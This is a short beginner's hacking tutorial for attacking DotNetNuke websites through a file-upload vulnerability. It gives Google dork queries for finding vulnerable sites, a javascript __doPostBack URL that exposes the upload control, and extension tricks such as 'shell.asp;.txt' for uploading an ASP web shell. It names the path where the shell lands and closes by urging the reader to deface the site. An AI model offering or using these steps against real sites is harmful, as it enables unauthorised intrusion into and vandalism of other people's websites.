DNN Attack For Beginners

What Is DNN ?

DNN stands for Dot Net Nuke. It have an remote arbitrary File Upload vulnerability. simply said iploading

vulnerrability.

Finding vulnerable websites

Find vulnerable websites by GOOGLE dorks :

inurl:/fck/fcklinkgallery.aspx

inurl:/tabid/36/language/en-US/Default.aspx

I got a target

Select "File" from list.

The in url bar paste the javascript ;

javascript:__doPostBack('ctlURL$cmdUpload','')

Now there appear a uploading bar on page. As seen be below :

Now upload your ASP shell as "shell.asp;.txt , shell.asp;.jpg"
your uploads will go to "http://www.site.com/Portals/0/shell.asp;.txt"

Now  you have a Shell Access to the website . Now deface the website.
Hope You Enjoy....!